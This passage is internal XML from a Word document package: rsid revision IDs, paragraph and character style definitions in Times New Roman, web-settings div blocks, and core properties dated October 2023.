  <w:num w:numId="2" w16cid:durableId="1166360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AD"/>
    <w:rsid w:val="00014DA0"/>
    <w:rsid w:val="000316F7"/>
    <w:rsid w:val="00065992"/>
    <w:rsid w:val="00320924"/>
    <w:rsid w:val="00403572"/>
    <w:rsid w:val="004A3E86"/>
    <w:rsid w:val="0054787A"/>
    <w:rsid w:val="00621ECC"/>
    <w:rsid w:val="00634346"/>
    <w:rsid w:val="006F7D1B"/>
    <w:rsid w:val="00703868"/>
    <w:rsid w:val="007D6446"/>
    <w:rsid w:val="0082645D"/>
    <w:rsid w:val="008B1E1D"/>
    <w:rsid w:val="008C7474"/>
    <w:rsid w:val="00912355"/>
    <w:rsid w:val="009135AD"/>
    <w:rsid w:val="00A554C7"/>
    <w:rsid w:val="00BA0263"/>
    <w:rsid w:val="00C769EB"/>
    <w:rsid w:val="00D25425"/>
    <w:rsid w:val="00D362BE"/>
    <w:rsid w:val="00F736B3"/>
    <w:rsid w:val="00FB2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7259"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{4C9A519F-88D7-46EB-B1C8-FBD6127C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E86"/>
    <w:pPr>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="40"/>
      <w:szCs w:val="40"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="TitleChar">
    <w:name w:val="Title Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Title"/>
    <w:uiPriority w:val="10"/>
    <w:rsid w:val="004A3E86"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="40"/>
      <w:szCs w:val="40"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BodyText">
    <w:name w:val="Body Text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="BodyTextChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00BA0263"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="BodyTextChar">
    <w:name w:val="Body Text Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="BodyText"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00BA0263"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00547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3977">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="260258455">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="102533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26</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-10-03T04:38:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-10-09T06:05:00Z</dcterms:modified>
</cp:coreProperties>
</file>